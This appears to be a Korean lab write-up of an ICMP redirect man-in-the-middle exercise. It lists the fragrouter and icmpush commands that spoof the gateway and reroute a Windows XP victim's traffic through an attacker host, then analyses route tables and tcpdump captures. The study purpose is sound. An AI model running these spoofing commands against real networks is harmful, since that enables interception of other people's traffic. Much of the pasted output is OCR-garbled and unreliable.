2020. 7. 8.

[Network] ICMP redirect 실습


    1. 구성과 계획
    • 네트워크 구성도
    공격자 att6 - 192.168.10.149/00:0C:29:4F:41:6E
    피해자 winXP - 192.168.10.147/00-0C-29-59-88-56

    • 과정 정리
    Step 1. 환경구성
    • 공격자 att6 fragrouter, icmpush
    • 피해자 winxp 방화벽 해제
    Step 2. fragrouter 실행 공격자가 피해자로 ICMP 리다이렉트(네이버) 전송
    Step 3. 패킷 캡처
    Step 4. 피해자 네이버로 ping
    Step 5. 패킷 해석

    1. 관련내용정리
    ICMP redirect 이용하여 라우터인척 스니핑을 있다.
    1. 실습과정
    Step 1. 환경구성
    • 공격자 att6 fragrouter, icmpush, icmp_redir
    tar xvfz fragrouter-1.6.tar.gz
    cd fragrouter-1.6
    ./configure
    make
    make install

    yum  install -y icmpush

    gcc -o icmp_redir icmp_redir.c

    • 피해자 winxp 방화벽 해제
    Step 2. fragrouter 실행 공격자가 피해자로 ICMP 리다이렉트(네이버) 전송
    fragrouter -B1
    icmpush -red -c host -gw 192.168.10.149 -sp 192.168.10.1 -dest 23.35.221.113 192.168.10.147
    ./icmp_redir 192.168.10.1 192.168.10.147 23.35.221.113 192.168.10.149
    Step 3. 패킷 캡처
    wireshark on
    와이어샤크로는 icmp 차단되어 보이지 않아 tcp 이용하여 공격자 패킷을 캡쳐했다.
    tcpdump -xX -i eth0 host 192.168.10.148 > dump
    Step 4. 피해자 네이버로 ping
    Step 5. arp 테이블 확인 패킷 해석
    route PRINT
    C: WDocuments and 
SettingsWkstII >route PRINT 
Interface List 
MS TCP Loopback interf ace 
3x1øøø3 .øø øC 
56 
192.168.10.14? 
192.168.10.14? 
192.168.10.14? 
192.168.10.14? 
192.168.10.14? 
192.168.10.14? 
29 
OIL* 
Rctiue Routes: 
Network Destination 
ø.ø.ø.ø 
23.35.221.113 
127.ø.ø.ø 
192.168.1ø.ø 
192.168.10.14? 
192.168.10.255 
224.ø.ø.ø 
255.255.255.255 
Default Gateway: 
59 
88 
AMD PCNET Family PCI 
Gateway 
Ethernet 
Adapter — 
Net mask 
ø.ø.ø.ø 
255.255.255.255 
255.ø.ø.ø 
255.255.255.ø 
255.255.255.255 
255.255.255.255 
240.ø.ø.ø 
255.255.255.255 
192.168.10.1 
Interf ace 
Metric 
192.168.10.1 
192.168.10.149 
127.ø.ø.1 
192.168.10.14? 
127.ø.ø.1 
192.168.10.14? 
192.168.10.14? 
127.ø.ø.1 
192.168.10.14? 
127.ø.ø.1
    라우팅 테이블을 보면 23.35.221.113 으로 가는 패킷은 192.168.10.149 가도록 설정하였다.
    icmp redirect
    180452003168 IP łg2168101 > łg216810147: ICMP redirect a23-35-221-113.depIoy.staticzkamaitechnoIogies.com to host 192.168.10.149, length 36 
0x0000: 4500 0038 3372 0000 feoł fi6d coag oaoł 
0x0010: coag 0501 afaa coag oags 4500 0038 
0x0020: 4a2f 0000 fe06 02co coag oagg 1723 dd71 J/ 
0x0030: 0000 0000 COCS 
180452.547138 IP łg2168101 > 192.168.10.147: ICMP redirect a23-35-221-113.depIoy.staticzkamaitechnoIogies.com to host 192.168.10.149, length 36 
0x0000: 
0x0010: 
0x0020: 
0x0030: 
4500 0038 3372 0000 feoł fi6d coag oaoł 
coag 0501 afaa coag oags 4500 0038 
4a2f 0000 fe06 02co coag 1723 dd71 J/ 
0000 0000 COCS

    192.168.10.1 보내는것처럼 조작된 패킷이 피해자인 192.168.10.147에게 ICMP redirect 보내 1723 dd71(23.35.221.113) 네이버에 접속할때는 c0a8 0a95(192.168.10.149)으로 가라고 보낸것이다.

    arp echo request, reply
    ARP, Request who-has lg216810147 tell W21681014g, length 28 
oxoooo: 0001 0800 0604 
ox0010: [G$]oooo 0000 
ARP, Reply is-at 
(Oui unknown), length 46 
OXOOOO: 0001 0800 0604 0002 OOOC 2gsg 885 coag 
ox0010: 0000 m)0An 
ox0020: 0000 0000 0000 0000 0000 0000 0000

    ip 헤더는 변경이 없다. 하지만 맥주소가 바뀐다.
    request
    C0a8 0a95(192.168.10.147) -> c0a8 0a93(192.168.10.149)
    Winxp(192.168.10.147) -> att6(192.168.10.149/00:0C:29:4F:41:6E)
    // 라우팅이 att6으로 되어있기 때문에 att6으로 날아간다.
    reply
    c0a8 0a93(192.168.10.149) -> C0a8 0a95(192.168.10.147)
    att6(192.168.10.149/00:0C:29:4F:41:6E) -> Winxp(192.168.10.147/00-0C-29-59-88-56)
    // 네이버에서 응답이 온게 아니라 149번을 통해서 응답이 온다.

    icmp
    18:05:43.503244 IP a184-28-153-161.deploy.static.akamaitechnologies.com > 192.168.10.147: ICMP echo reply, id 
OXOOOO: 4500 003c lec9 0000 3701 E..<....7.G..... 
ox0010: If5c 0200 3400 6162 6364 .......W..4.abcd 
ox0020: 6566 6768 6b6c 6d6e 6f70 7172 7374 efghijklmnopqrst 
ox0030: 7576 7761 6263 6465 6667 6869 
uvwabcdefghi 
18:05:44.467255 IP 192.168.10.147 > a184-28-153-161.deploy.static.akamaitechnologies.com: ICMP echo request, 
oxoooo: 
ox0010: 
ox0020: 
ox0030: 
4500 003c 082a 0000 8001 
b81c 99a1 0800 0200 3500 6162 6364 .......W..5.abcd 
6566 6768 6b6c 6d6e 6f70 7172 7374 efghijklmnopqrst 
7576 7761 6263 6465 6667 6869 
uwwabcdefghi

    request
    b81c 99a1(184.28.153.161) -> c0a8 0a93(192.168.10.149)
    reply
    c0a8 0a93(192.168.10.149) -> b81c 99a1(184.28.153.161)

댓글 없음:

댓글 쓰기